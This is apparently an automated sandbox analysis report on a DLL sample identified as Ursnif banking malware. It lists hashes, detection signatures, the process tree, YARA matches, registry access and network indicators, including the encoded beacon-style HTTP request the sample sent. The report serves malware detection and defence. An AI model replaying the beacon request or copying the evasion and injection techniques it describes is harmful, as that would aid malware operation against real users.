Loading ...

Play interactive tourEdit tour

Analysis Report statis1c.dll

Overview

General Information

Sample Name:statis1c.dll
Analysis ID:330536
MD5:ea2e244513c36f594c69f7e1d5c17317
SHA1:ebac5d8a67a2be742c2139f3cdb25316ff4391e0
SHA256:9cabfa3e674b0274b3b802695b49d9634e027fb15aa827afaf793104f7317690
Tags:dllgoziisfbursnif

Most interesting Screenshot:

Detection

Ursnif
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Ursnif
Creates a COM Internet Explorer object
Machine Learning detection for sample
PE file has nameless sections
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5384 cmdline: loaddll32.exe 'C:\Users\user\Desktop\statis1c.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • regsvr32.exe (PID: 5664 cmdline: regsvr32.exe /s C:\Users\user\Desktop\statis1c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • cmd.exe (PID: 5504 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 5300 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6068 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5976 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82970 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: statis1c.dllVirustotal: Detection: 11%Perma Link
            Machine Learning detection for sampleShow sources
            Source: statis1c.dllJoe Sandbox ML: detected
            Source: 1.2.regsvr32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011232BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_011232BA

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /images/_2BGeSkvWMHh/BUynXFpIFo3/59SKHc0FAlUbbS/AAtvmEP6bSxngBIQxSpAq/spVOjE6SRSYYM_2B/1kssSPGZE9BGerK/aySQiowSzRMTuPb2VY/iGbL_2FuQ/kIutS_2BJ_2FiHpi94lZ/RSri6_2BC0CK8ZJ8hbj/y5F3ZxB7PT1kx7tzJMiZB9/E_2Bs_2BXabKH/oLNRmzX7_2BipXb_2B/zagb.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: de-ch[1].htm.4.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: de-ch[1].htm.4.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.4.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: de-ch[1].htm.4.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.4.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: auction[1].htm.4.drString found in binary or memory: http://popup.taboola.com/german
            Source: {4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.4.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: iab2Data[1].json.4.drString found in binary or memory: https://bealion.com/politica-de-cookies
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: iab2Data[1].json.4.drString found in binary or memory: https://channelpilot.co.uk/privacy-policy
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=235514&amp;a=3064090&amp;g=24888006&amp;epi=dech-shoppingstri
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=dech
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=dech-shoppingstri
            Source: {4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: {4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: {4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: iab2Data[1].json.4.drString found in binary or memory: https://docs.prebid.org/privacy.html
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: auction[1].htm.4.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: de-ch[1].htm.4.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: de-ch[1].htm.4.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
            Source: iab2Data[1].json.4.drString found in binary or memory: https://listonic.com/privacy/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1608015908&amp;rver
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1608015908&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/logout.srf?ct=1608015909&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1608015908&amp;rver=7.0.6730.0&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: de-ch[1].htm.4.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.4.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.4.drString found in binary or memory: https://outlook.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: de-ch[1].htm.4.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
            Source: iab2Data[1].json.4.drString found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
            Source: iab2Data[1].json.4.drString found in binary or memory: https://quantyoo.de/datenschutz
            Source: iab2Data[1].json.4.drString found in binary or memory: https://related.hu/adatkezeles/
            Source: {4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
            Source: imagestore.dat.4.dr, imagestore.dat.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bV3UF.img?h=368&amp
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://support.skype.com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://twitter.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://twitter.com/i/notifications;Ich
            Source: de-ch[1].htm.4.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1
            Source: de-ch[1].htm.4.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.admo.tv/en/privacy-policy
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.brightcom.com/privacy-policy/
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.gadsme.com/privacy-policy/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/
            Source: {4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/autofahrer-f%c3%a4hrt-fussg%c3%a4ngerin-an-sie-stirbt-noch-an-u
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/der-sp-vielflieger-und-2-minuten-schneller-arbeiten/ar-BB1bVrEJ
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-kantonsrat-beschliesst-im-eiltempo-ein-erstes-
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/ein-dieb-dringt-in-z%c3%bcrich-mehrfach-in-hauseing%c3%a4nge-ei
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/ist-ein-semmeli-frisch-mit-b%c3%bcndnerfleisch-belegt-darf-es-s
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/mehr-karton-mehr-glas-aber-weniger-papier-die-neue-normalit%c3%
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/obergericht-muss-strafe-f%c3%bcr-milchbuck-pr%c3%bcgler-neu-bes
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/pr%c3%bcgler-kritisiert-strafmass-zu-recht/ar-BB1bUOOz?ocid=hpl
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/sie-r%c3%a4t-zu-frischer-luft-und-dureschnufe/ar-BB1bVWZ8?ocid=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/und-pl%c3%b6tzlich-steht-da-ein-neuer-brunnen/ar-BB1bUYmF?ocid=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.remixd.com/privacy_policy.html
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
